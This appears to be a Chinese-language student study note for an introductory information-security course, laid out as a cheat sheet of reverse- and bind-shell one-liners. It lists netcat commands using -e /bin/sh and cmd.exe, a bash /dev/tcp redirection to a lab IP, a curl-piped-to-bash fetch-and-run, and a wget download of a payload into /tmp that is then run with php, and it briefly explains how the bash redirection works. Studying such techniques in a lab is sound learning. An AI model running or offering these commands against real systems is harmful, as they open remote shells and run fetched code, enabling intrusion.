2021-2022-1 20211407 資訊保安專業導論第三週學習總結
阿新 • • 發佈:2021-10-10
netcat 一句話反彈
獲取shell(想反彈誰的shell就在誰的後面加-e /bin/sh
或-e /bin/bash
)
正向shell: 客戶端主動連線伺服器並獲取伺服器shell
客戶端主動連線並得到反彈shell nc 服務端ip 8888 服務端監聽連線 nc -lvp 8888 -e /bin/sh # windows上:nc -lvp 8888 -e c:\windows\system32\cmd.exe
反向shell: 伺服器端連線並反彈shell給客戶端
客戶端監聽 nc -lvp 8888 服務端連線客戶端 nc 客戶端ip 8888 -e /bin/sh# windows上:nc ip 8888 -e c:\windows\system32\cmd.exe
bash反彈shell
bash -i >& /dev/tcp/我們靶機ip/我們靶機port 0>&1
bash一句話命令詳解
以下針對常用的bash反彈一句話進行了拆分說明,具體內容如下。
其實以上bash反彈一句完整的解讀過程就是:
bash產生了一個互動環境與本地主機主動發起與目標主機8080埠建立的連線(即TCP 8080 會話連線)相結合,然後在重定向個tcp 8080會話連線,最後將使用者鍵盤輸入與使用者標準輸出相結合再次重定向給一個標準的輸出,即得到一個bash 反彈環境。
在反彈shell時要藉助netcat工具反彈
curl反彈shell
前提要利用bash一句話的情況下使用curl反彈shell
在存在命令執行的伺服器上執行curl ip|bash
,該ip的index檔案上含有bash一句話,就可以反彈shell。
例如在自己的伺服器index上寫上一句話
bash -i >& /dev/tcp/192.168.20.151/7777 0>&1
192.168.20.151就是作為監聽埠的伺服器用來得到反彈的shell。
存在一句話,利用curl反彈。
kali開啟監聽
wget方式反彈shell
利用wget進行下載執行
wget 192.168.20.130/shell.txt -O /tmp/x.php && php /tmp/x.php
利用下面貼出的php進行反彈。
開啟監聽